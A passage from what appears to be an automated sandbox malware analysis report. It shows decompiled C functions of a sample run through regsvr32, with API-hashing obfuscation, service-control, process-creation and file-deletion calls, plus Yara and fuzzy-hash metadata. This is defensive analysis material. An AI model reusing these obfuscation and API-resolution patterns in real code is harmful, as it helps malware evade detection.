				E00232528(_t26);
				_v32 = 0x1fdfe;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v16 = 0xd7cabc;
				_v16 = _v16 << 9;
				_v16 = _v16 ^ 0xaf947812;
				_v12 = 0xfcfc14;
				_v12 = _v12 + 0xffffa733;
				_v12 = _v12 ^ 0x00f70671;
				_v8 = 0x27786a;
				_v8 = _v8 + 0xffff8bfa;
				_v8 = _v8 + 0xffff8663;
				_v8 = _v8 ^ 0x6e53b40f;
				_v8 = _v8 ^ 0x6e7f6462;
				E00236F64(0x3fc2ff72, __ecx, __ecx, 0xbfd2d08a, 0x8a);
				_t33 = CloseHandle(_t38); // executed
				return _t33;
			}

0x00244fc0
0x00244fc3
0x00244fc6
0x00244fc7
0x00244fcc
0x00244fdb
0x00244fe1
0x00244fe9
0x00244fef
0x00244ff6
0x00244ffa
0x00245001
0x00245008
0x0024500f
0x00245016
0x0024501d
0x00245024
0x0024502b
0x00245032
0x00245042
0x0024504b
0x00245052

APIs

CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000000), ref: 0024504B

Strings

jx', xrefs: 00245016

Memory Dump Source

Source File: 00000004.00000002.470295129.0000000000231000.00000020.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: true

Associated: 00000004.00000002.470226459.0000000000230000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.470361015.0000000000252000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_230000_regsvr32.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID: jx'
API String ID: 2962429428-4176335217
Opcode ID: 2e2e9e2accd36b75fff351e754f185f7a9df212b513db96fe7ee5bdbe3d2046e
Instruction ID: a2046bdcac3d8eb61655b949a84fcac4b87656778b8b74d9337d5d01419d926b
Opcode Fuzzy Hash: 2e2e9e2accd36b75fff351e754f185f7a9df212b513db96fe7ee5bdbe3d2046e
Instruction Fuzzy Hash: E6018BB0D1130CFBDB04DFA8D90A9DEBBB4EF00310F10C188A50066261E3B40F169F91

Uniqueness

Uniqueness Score: -1.00%

Function 0024F423 Relevance: 1.6, APIs: 1, Instructions: 75
processCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E0024F423(int __ecx, struct _STARTUPINFOW* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, WCHAR* _a52, intOrPtr _a56, intOrPtr _a60, struct _PROCESS_INFORMATION* _a68) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t43;
				int _t51;
				signed int _t54;
				int _t59;
				struct _STARTUPINFOW* _t60;

				_push(_a68);
				_t60 = __edx;
				_push(0);
				_push(_a60);
				_t59 = __ecx;
				_push(_a56);
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(0);
				_push(0);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00232528(_t43);
				_v28 = 0x83cf4;
				_v24 = 0x1eb0c;
				_v20 = 0x9f2f8;
				_v16 = 0x28f804;
				_v16 = _v16 << 0xb;
				_v16 = _v16 ^ 0x47c45cc0;
				_v8 = 0x8ad8cf;
				_v8 = _v8 ^ 0x386eefb6;
				_v8 = _v8 << 0x10;
				_v8 = _v8 ^ 0x3776ee1a;
				_v12 = 0xb92135;
				_t54 = 0x1e;
				_v12 = _v12 / _t54;
				_v12 = _v12 ^ 0x0002f1af;
				E00236F64(0xa2704296, _t54, _t54, 0xbfd2d08a, 0x2d7);
				_t51 = CreateProcessW(_a52, _a4, 0, 0, _t59, 0, 0, 0, _t60, _a68); // executed
				return _t51;
			}

0x0024f42c
0x0024f431
0x0024f433
0x0024f434
0x0024f437
0x0024f439
0x0024f43c
0x0024f43f
0x0024f440
0x0024f443
0x0024f446
0x0024f449
0x0024f44c
0x0024f44d
0x0024f44e
0x0024f44f
0x0024f452
0x0024f455
0x0024f458
0x0024f45b
0x0024f45c
0x0024f45d
0x0024f462
0x0024f46c
0x0024f475
0x0024f47c
0x0024f483
0x0024f487
0x0024f48e
0x0024f495
0x0024f49c
0x0024f4a0
0x0024f4a7
0x0024f4b3
0x0024f4bb
0x0024f4be
0x0024f4da
0x0024f4f2
0x0024f4fa

APIs

CreateProcessW.KERNEL32(?,0002F1AF,00000000,00000000,0112E130,00000000,00000000,00000000,?,?), ref: 0024F4F2

Memory Dump Source

Source File: 00000004.00000002.470295129.0000000000231000.00000020.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: true

Associated: 00000004.00000002.470226459.0000000000230000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.470361015.0000000000252000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_230000_regsvr32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 89c47c55b78eb8eb065f71e279081a821e0499847fc4bad1336bbffb059a6912
Instruction ID: c3bce05647cfb30ec020803597828f4994fdd9a6a9bb84c88533249c083364dd
Opcode Fuzzy Hash: 89c47c55b78eb8eb065f71e279081a821e0499847fc4bad1336bbffb059a6912
Instruction Fuzzy Hash: 9D21F8B290120CBFAF059F95DD49CEEBFB9EF48398F508158FA1466110C3728E64DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0023D5B0 Relevance: 1.6, APIs: 1, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0023D5B0(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a24) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t37;
				intOrPtr* _t45;
				void* _t46;
				signed int _t49;
				void* _t54;
				void* _t55;

				_t55 = __edx;
				_t54 = __ecx;
				E00232528(_t37);
				_v28 = 0xad39f;
				_v24 = 0xde296;
				_v20 = 0;
				_v8 = 0x70c466;
				_v8 = _v8 << 0xc;
				_t49 = 7;
				_v8 = _v8 * 0x2d;
				_v8 = _v8 / _t49;
				_v8 = _v8 ^ 0x05ce2cd5;
				_v16 = 0xa4ad72;
				_v16 = _v16 << 0xe;
				_v16 = _v16 ^ 0x2b5a0495;
				_v12 = 0x520372;
				_v12 = _v12 ^ 0x172d204c;
				_v12 = _v12 + 0xffffaf49;
				_v12 = _v12 ^ 0x1774e52f;
				_t45 = E00236F64(0xb0aa831, _t49, _t49, 0xfd28539d, 0x245);
				_t46 =  *_t45(0, _t54, 0, 0, _t55, __ecx, __edx, _a4, _a8, _a12, _a16, 0, _a24, 0, 0); // executed
				return _t46;
			}

0x0023d5bb
0x0023d5c2
0x0023d5d3
0x0023d5d8
0x0023d5e2
0x0023d5eb
0x0023d5ee
0x0023d5f5
0x0023d5ff
0x0023d60a
0x0023d613
0x0023d616
0x0023d61d
0x0023d624
0x0023d628
0x0023d62f
0x0023d636
0x0023d63d
0x0023d644
0x0023d65a
0x0023d667
0x0023d66f

APIs

SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 0023D667

Memory Dump Source

Source File: 00000004.00000002.470295129.0000000000231000.00000020.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: true

Associated: 00000004.00000002.470226459.0000000000230000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.470361015.0000000000252000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_230000_regsvr32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: 3e4d0cd4ef98b2ed46fc4406835a32c7c39bdcfc447735a49e47ea24f902b1ee
Instruction ID: c854957b2b88906baa8693ac23fd5e40d4c57cb529f6dc54d18bccbd9ab0150f
Opcode Fuzzy Hash: 3e4d0cd4ef98b2ed46fc4406835a32c7c39bdcfc447735a49e47ea24f902b1ee
Instruction Fuzzy Hash: D92136B1D0120CFFDF04DF95DC898AEBBB9EB49354F208499F915AA251D2705F109B61

Uniqueness

Uniqueness Score: -1.00%

Function 00245053 Relevance: 1.6, APIs: 1, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00245053(void* __ecx, intOrPtr _a4, int _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				short* _v20;
				short* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t40;
				void* _t50;
				signed int _t52;
				signed int _t53;

				_push(_a12);
				_push(0);
				_push(_a4);
				_push(0);
				E00232528(_t40);
				_v32 = 0x2a9d;
				_v28 = 0xe590d;
				_v24 = 0;
				_v20 = 0;
				_v16 = 0x93a489;
				_v16 = _v16 | 0xa6ef63c2;
				_v16 = _v16 ^ 0xa6f135cf;
				_v8 = 0x549a1b;
				_v8 = _v8 >> 0xe;
				_t52 = 0x71;
				_v8 = _v8 / _t52;
				_v8 = _v8 + 0xffff394e;
				_v8 = _v8 ^ 0xfff69fe6;
				_v12 = 0x6df274;
				_t53 = 0x21;
				_v12 = _v12 / _t53;
				_v12 = _v12 + 0xaad;
				_v12 = _v12 ^ 0x000c8a78;
				E00236F64(0x16a6f636, _t53, _t53, 0x28caee4, 0x10f);
				_t50 = OpenSCManagerW(0, 0, _a12); // executed
				return _t50;
			}

0x0024505a
0x0024505f
0x00245060
0x00245063
0x00245065
0x0024506a
0x00245074
0x0024507d
0x00245080
0x00245083
0x0024508a
0x00245091
0x00245098
0x0024509f
0x002450a8
0x002450ad
0x002450b2
0x002450b9
0x002450c0
0x002450ca
0x002450d2
0x002450d5
0x002450dc
0x002450f8
0x00245105
0x0024510b

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,04DBE7AE,?,?,?,?,?,?,?,?,000003D7), ref: 00245105

Memory Dump Source

Source File: 00000004.00000002.470295129.0000000000231000.00000020.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: true

Associated: 00000004.00000002.470226459.0000000000230000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.470361015.0000000000252000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_230000_regsvr32.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: 062b265e0c38660167146bf6ec40f1bd107cb5be0e2a6583e77f8a68c1b24397
Instruction ID: 7d5fa297a7cf3562e9a749edde11159a703c845c473692a3742ea44d09a88b66
Opcode Fuzzy Hash: 062b265e0c38660167146bf6ec40f1bd107cb5be0e2a6583e77f8a68c1b24397
Instruction Fuzzy Hash: DA113471E11308FBDB14DFEAC84A8DEBFB9EB45324F508089E514A6250D7B54B64CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0023216E Relevance: 1.6, APIs: 1, Instructions: 54
memoryCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E0023216E(void* __ecx, void* __edx, intOrPtr _a4, long _a8, long _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				void* _v28;
				intOrPtr _v32;
				void* _t34;
				void* _t43;
				signed int _t45;
				void* _t51;

				_push(_a12);
				_t51 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E00232528(_t34);
				_v32 = 0xa8d99;
				asm("stosd");
				asm("stosd");
				_t45 = 0x5d;
				asm("stosd");
				_v8 = 0x801b8c;
				_v8 = _v8 + 0xb63c;
				_v8 = _v8 + 0x64a0;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x00078271;
				_v16 = 0xc3659c;
				_v16 = _v16 + 0xa438;
				_v16 = _v16 ^ 0x00c6ab86;
				_v12 = 0xefb99d;
				_v12 = _v12 / _t45;
				_v12 = _v12 ^ 0x0005aece;
				E00236F64(0x80ecea7b, _t45, _t45, 0xbfd2d08a, 0x232);
				_t43 = RtlAllocateHeap(_t51, _a12, _a8); // executed
				return _t43;
			}

0x00232176
0x00232179
0x0023217b
0x0023217e
0x00232182
0x00232183
0x00232188
0x00232197
0x0023219c
0x0023219d
0x002321a8
0x002321a9
0x002321b0
0x002321b7
0x002321be
0x002321c2
0x002321c9
0x002321d0
0x002321d7
0x002321de
0x002321eb
0x002321ee
0x00232204
0x00232213
0x0023221a

APIs

RtlAllocateHeap.NTDLL(?,?,00C6AB86), ref: 00232213

Memory Dump Source

Source File: 00000004.00000002.470295129.0000000000231000.00000020.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: true

Associated: 00000004.00000002.470226459.0000000000230000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.470361015.0000000000252000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_230000_regsvr32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 877309134cd3abf4ec97cce20064ae1a94fc221f075e1fc1519e893e8fec8534
Instruction ID: 2b2cb287de368df3c796a4eba85c52235ff8b02a6501a28e779451fe98fe485b
Opcode Fuzzy Hash: 877309134cd3abf4ec97cce20064ae1a94fc221f075e1fc1519e893e8fec8534
Instruction Fuzzy Hash: B81116B6D11208FBDF04DFD4C80A8DEBBB5EF85324F50C088EA1466251E7B95B189F91

Uniqueness

Uniqueness Score: -1.00%

Function 002499D4 Relevance: 1.6, APIs: 1, Instructions: 53
serviceCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E002499D4(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _t36;
				void* _t44;
				signed int _t46;
				void* _t51;
				int _t52;

				_push(_a16);
				_t51 = __edx;
				_t52 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00232528(_t36);
				_v20 = 0xb0be;
				_v16 = 0xa0f70;
				_v12 = 0x1ae6;
				_v12 = _v12 >> 8;
				_v12 = _v12 | 0x9edc00d8;
				_v12 = _v12 ^ 0x9ed4785b;
				_v16 = 0xd7138f;
				_t46 = 0x6e;
				_v16 = _v16 / _t46;
				_v16 = _v16 ^ 0x00087cf8;
				_v8 = 0xf9eec1;
				_v8 = _v8 << 5;
				_v8 = _v8 + 0xc251;
				_v8 = _v8 | 0x3f79b110;
				_v8 = _v8 ^ 0x3f7794ea;
				E00236F64(0x49feba1e, _t46, _t46, 0x28caee4, 0x13b);
				_t44 = OpenServiceW(_t51, _a12, _t52); // executed
				return _t44;
			}

0x002499dc
0x002499df
0x002499e1
0x002499e3
0x002499e6
0x002499e9
0x002499ec
0x002499ed
0x002499ee
0x002499f3
0x002499fd
0x00249a06
0x00249a0d
0x00249a11
0x00249a18
0x00249a1f
0x00249a2b
0x00249a33
0x00249a36
0x00249a3d
0x00249a44
0x00249a48
0x00249a4f
0x00249a56
0x00249a72
0x00249a7f
0x00249a86

APIs

OpenServiceW.ADVAPI32(000003D7,0000B0BE,?,?,?,?,?,?,?,?,?,00000000,000003D7), ref: 00249A7F

Memory Dump Source

Source File: 00000004.00000002.470295129.0000000000231000.00000020.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: true

Associated: 00000004.00000002.470226459.0000000000230000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.470361015.0000000000252000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_230000_regsvr32.jbxd

Yara matches

Similarity

API ID: OpenService
String ID:
API String ID: 3098006287-0
Opcode ID: 05cb593e6776f8720f40e16095b93bc29f3b4ae51e993e5b1b1860102ad532ef
Instruction ID: 37d11e9d1e826b76c155777b6f95f1cb6b469d12a9349f3f971f2752954bf2b7
Opcode Fuzzy Hash: 05cb593e6776f8720f40e16095b93bc29f3b4ae51e993e5b1b1860102ad532ef
Instruction Fuzzy Hash: 76114676D00208FBDF04DFDAD84A8DEBBB5EF45704F108089E925A7250E7B54B24DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00232DDF Relevance: 1.6, APIs: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00232DDF(void* __ecx, void* __edx, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				void* _t36;
				intOrPtr* _t44;
				void* _t45;
				signed int _t47;

				E00232528(_t36);
				_v16 = 0x252a0;
				_v16 = 0xfec68f;
				_v16 = _v16 + 0xc2fd;
				_v16 = _v16 ^ 0x00fefa21;
				_v8 = 0x245331;
				_v8 = _v8 ^ 0xfeaa7e33;
				_t47 = 0x30;
				_v8 = _v8 / _t47;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x00558f20;
				_v12 = 0x107ae4;
				_v12 = _v12 * 0x15;
				_v12 = _v12 << 0xb;
				_v12 = _v12 ^ 0xd0a43417;
				_t44 = E00236F64(0x54e8d29f, _t47, _t47, 0xbfd2d08a, 0x1d3);
				_t45 =  *_t44(_a12, 0, _a20, 0x28, __ecx, __edx, 0x28, 0, _a12, _a16, _a20, _a24); // executed
				return _t45;
			}

0x00232df7
0x00232dfc
0x00232e06
0x00232e0f
0x00232e16
0x00232e1d
0x00232e24
0x00232e30
0x00232e38
0x00232e3b
0x00232e3f
0x00232e46
0x00232e5d
0x00232e60
0x00232e64
0x00232e74
0x00232e86
0x00232e8b

APIs

SetFileInformationByHandle.KERNEL32(?,00000000,?,00000028), ref: 00232E86

Memory Dump Source

Source File: 00000004.00000002.470295129.0000000000231000.00000020.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: true

Associated: 00000004.00000002.470226459.0000000000230000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.470361015.0000000000252000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_230000_regsvr32.jbxd

Yara matches

Similarity

API ID: FileHandleInformation
String ID:
API String ID: 3935143524-0
Opcode ID: 36233d8eae62c5799e6b21827bc8b8880b921a3b052657da0ea28c69f1be97bf
Instruction ID: e4c8033e90d7c482683954e749b30eb50fadf2f9c359c797648dc3594f720226
Opcode Fuzzy Hash: 36233d8eae62c5799e6b21827bc8b8880b921a3b052657da0ea28c69f1be97bf
Instruction Fuzzy Hash: 37115571D00208FBEF08DFE0D94AA9EBFB5EB44704F108098BA1076190D7B19B68AF80

Uniqueness

Uniqueness Score: -1.00%

Function 0024A952 Relevance: 1.5, APIs: 1, Instructions: 44
serviceCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E0024A952(void* __ecx, void* __edx, intOrPtr _a4, void* _a8) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				void* _t35;
				int _t44;
				signed int _t46;

				_push(_a8);
				_push(_a4);
				E00232528(_t35);
				_v20 = _v20 & 0x00000000;
				_v24 = 0x2ed56;
				_v16 = 0xd6c71c;
				_v16 = _v16 ^ 0xb803002a;
				_v16 = _v16 ^ 0xb8deec5c;
				_v8 = 0x70049b;
				_t46 = 0x74;
				_v8 = _v8 * 0x67;
				_v8 = _v8 << 1;
				_v8 = _v8 / _t46;
				_v8 = _v8 ^ 0x00c89d1a;
				_v12 = 0xe5b045;
				_v12 = _v12 >> 3;
				_v12 = _v12 >> 9;
				_v12 = _v12 ^ 0x000283fc;
				E00236F64(0x39936f17, _t46, _t46, 0x28caee4, 0x23e);
				_t44 = CloseServiceHandle(_a8); // executed
				return _t44;
			}

0x0024a958
0x0024a95b
0x0024a960
0x0024a965
0x0024a96c
0x0024a975
0x0024a97c
0x0024a983
0x0024a98a
0x0024a997
0x0024a9a2
0x0024a9a5
0x0024a9ae
0x0024a9b1
0x0024a9b8
0x0024a9bf
0x0024a9c3
0x0024a9c7
0x0024a9dd
0x0024a9e8
0x0024a9ed

APIs

CloseServiceHandle.ADVAPI32(B8DEEC5C), ref: 0024A9E8

Memory Dump Source

Source File: 00000004.00000002.470295129.0000000000231000.00000020.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: true

Associated: 00000004.00000002.470226459.0000000000230000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.470361015.0000000000252000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_230000_regsvr32.jbxd

Yara matches

Similarity

API ID: CloseHandleService
String ID:
API String ID: 1725840886-0
Opcode ID: 4117415087f2ab22f0743ae43d7550e93081f0f4b8c13af8f698824d627ad6ea
Instruction ID: af38c16deefca74c7a62148634d1b310015ed9b26b7206f7159835aab31f2b70
Opcode Fuzzy Hash: 4117415087f2ab22f0743ae43d7550e93081f0f4b8c13af8f698824d627ad6ea
Instruction Fuzzy Hash: 4C1145B5D01208FBDF04EFA8D90A9AEBBB4EB10304F20C088E414A7290D7B55B14CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0024EE45 Relevance: 1.5, APIs: 1, Instructions: 40
fileCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0024EE45(void* __ecx, void* __edx, WCHAR* _a4) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				void* _t30;
				int _t38;
				signed int _t40;

				_push(_a4);
				E00232528(_t30);
				_v16 = 0x7715;
				_v16 = 0xe656bb;
				_v16 = _v16 << 4;
				_v16 = _v16 ^ 0x0e66b312;
				_v12 = 0xd54794;
				_v12 = _v12 + 0x7442;
				_v12 = _v12 ^ 0x00dbad13;
				_v8 = 0x59f9a2;
				_v8 = _v8 << 1;
				_t40 = 7;
				_v8 = _v8 / _t40;
				_v8 = _v8 >> 1;
				_v8 = _v8 ^ 0x0005c87b;
				E00236F64(0x61a59502, _t40, _t40, 0xbfd2d08a, 9);
				_t38 = DeleteFileW(_a4); // executed
				return _t38;
			}

0x0024ee4b
0x0024ee50
0x0024ee55
0x0024ee5f
0x0024ee68
0x0024ee6c
0x0024ee73
0x0024ee7a
0x0024ee81
0x0024ee88
0x0024ee8f
0x0024ee97
0x0024ee9c
0x0024ee9f
0x0024eea2
0x0024eebe
0x0024eec9
0x0024eece

APIs

DeleteFileW.KERNEL32(00DBAD13), ref: 0024EEC9

Memory Dump Source

Source File: 00000004.00000002.470295129.0000000000231000.00000020.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: true

Associated: 00000004.00000002.470226459.0000000000230000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.470361015.0000000000252000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_230000_regsvr32.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 39abb3544c19608eb9dfc935e545f7e6d4307e8a2d514f54c7c478c65c2abaf0
Instruction ID: d40ed059a123c57cec390e9e811e1f056efa3a6ccabdc78d8fdf4bc65df95c68
Opcode Fuzzy Hash: 39abb3544c19608eb9dfc935e545f7e6d4307e8a2d514f54c7c478c65c2abaf0
Instruction Fuzzy Hash: 91015EB1D04208FBDB04DFE4D90A99DBBB4EB40304F20C098E91567290E7B55B68DF51

Uniqueness

Uniqueness Score: -1.00%

Function 0023D670 Relevance: 1.5, APIs: 1, Instructions: 39
libraryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E0023D670(void* __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8) {
				unsigned int _v8;
				unsigned int _v12;
				signed int _v16;
				void* _t33;
				struct HINSTANCE__* _t39;

				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E00232528(_t33);
				_v16 = 0xf4d06;
				_v12 = 0x5404e4;
				_v12 = _v12 >> 5;
				_v12 = _v12 ^ 0xb582df74;
				_v12 = _v12 >> 1;
				_v12 = _v12 ^ 0x5ac6b88c;
				_v16 = 0x81adee;
				_v16 = _v16 >> 0xe;
				_v16 = _v16 << 1;
				_v16 = _v16 ^ 0x0009bc6e;
				_v8 = 0x5ad66e;
				_v8 = _v8 << 8;
				_v8 = _v8 >> 5;
				_v8 = _v8 + 0x4437;
				_v8 = _v8 ^ 0x02d06663;
				E00236F64(0xfbae0770, __ecx, __ecx, 0xbfd2d08a, 0x8e);
				_t39 = LoadLibraryW(_a8); // executed
				return _t39;
			}

0x0023d676
0x0023d679
0x0023d67d
0x0023d67e
0x0023d683
0x0023d68d
0x0023d694
0x0023d698
0x0023d69f
0x0023d6a2
0x0023d6a9
0x0023d6b0
0x0023d6b4
0x0023d6b7
0x0023d6be
0x0023d6c5
0x0023d6c9
0x0023d6cd
0x0023d6d4
0x0023d6f5
0x0023d700
0x0023d705

APIs

LoadLibraryW.KERNEL32(0009BC6E), ref: 0023D700

Memory Dump Source

Source File: 00000004.00000002.470295129.0000000000231000.00000020.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: true

Associated: 00000004.00000002.470226459.0000000000230000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.470361015.0000000000252000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_230000_regsvr32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 10ec82d59e3dc17a1e79c0d695acb6648fcaa1bf077b44ecb67951beac119516
Instruction ID: 02bdfc7c7fee103d946fd0de4f8fce7e399cfe82c5e61a19f3f3e4a7d1ea1713
Opcode Fuzzy Hash: 10ec82d59e3dc17a1e79c0d695acb6648fcaa1bf077b44ecb67951beac119516
Instruction Fuzzy Hash: 5001F0B2C0060CFBCB09EFE4D94A89EBBB4EB00704F60C188E915A7251D7B59B58DF91

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: regsvr32.exePID: 732, Parent PID: 2140COMMON

Execution Graph

Execution Coverage:	22.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	1%
Total number of Nodes:	513
Total number of Limit Nodes:	30

Executed Functions

Function 0040F7F9 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040F7F9(int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _t37;
				signed int _t38;
				int _t43;

				_v20 = 0xfaaa0;
				_v16 = 0xf9e96;
				_v8 = 0xe16eb8;
				_v8 = _v8 | 0x760fb993;
				_v8 = _v8 >> 5;
				_t38 = 0x21;
				_t43 = __edx;
				_v8 = _v8 / _t38;
				_v8 = _v8 ^ 0x00153856;
				_v16 = 0x54520b;
				_v16 = _v16 << 0x10;
				_v16 = _v16 ^ 0x5206ddf9;
				_v12 = 0x6fea9c;
				_v12 = _v12 << 0xe;
				_v12 = _v12 ^ 0xf7433044;
				_v12 = _v12 ^ 0x0de37421;
				E00406F64(0xa0122aaa, _t38, _t38, 0xbfd2d08a, 0x2c1);
				_t37 = CreateToolhelp32Snapshot(_t43, 0); // executed
				return _t37;
			}

0x0040f7ff
0x0040f806
0x0040f80d
0x0040f814
0x0040f81b
0x0040f825
0x0040f826
0x0040f831
0x0040f834
0x0040f83b
0x0040f842
0x0040f846
0x0040f84d
0x0040f854
0x0040f858
0x0040f85f
0x0040f87b
0x0040f886
0x0040f88c

APIs

CreateToolhelp32Snapshot.KERNEL32(00D9CCF9,00000000,?,?,?,?), ref: 0040F886

Strings

!t, xrefs: 0040F85F

Memory Dump Source

Source File: 00000005.00000002.735867626.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.735864828.0000000000400000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.735884155.0000000000422000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_regsvr32.jbxd

Yara matches

Similarity

API ID: CreateSnapshotToolhelp32
String ID: !t
API String ID: 3332741929-514094388
Opcode ID: 05cca1f472e3647d70aa0c02199831e2db045729942b0bee70c5a40cb7020f8a
Instruction ID: 196e032057f817179a980c65566950dc2efcc32dc71baebb0a6dd031811cf3cd
Opcode Fuzzy Hash: 05cca1f472e3647d70aa0c02199831e2db045729942b0bee70c5a40cb7020f8a
Instruction Fuzzy Hash: 98011771D05208FBDB04EFE5D94A5DDBFB4EB04704F208189E525AB241D7B41B149F45

Uniqueness

Uniqueness Score: -1.00%

Function 00405D75 Relevance: 1.5, APIs: 1, Instructions: 49
filenetworkCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00405D75(void* __ecx, void* __edx, DWORD* _a4, long _a8, void* _a12, intOrPtr _a16, void* _a20, intOrPtr _a24) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _t39;
				int _t47;
				signed int _t49;

				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				E00402528(_t39);
				_v20 = 0x8d125;
				_v16 = 0x595ff;
				_v16 = 0xb39d26;
				_v16 = _v16 | 0xbbe47ef1;
				_v16 = _v16 ^ 0xbbfde73d;
				_v12 = 0xa1cfdc;
				_v12 = _v12 << 7;
				_v12 = _v12 ^ 0x50eedc75;
				_v8 = 0x17e259;
				_v8 = _v8 | 0xfa5b4ef3;
				_v8 = _v8 >> 5;
				_t49 = 0x52;
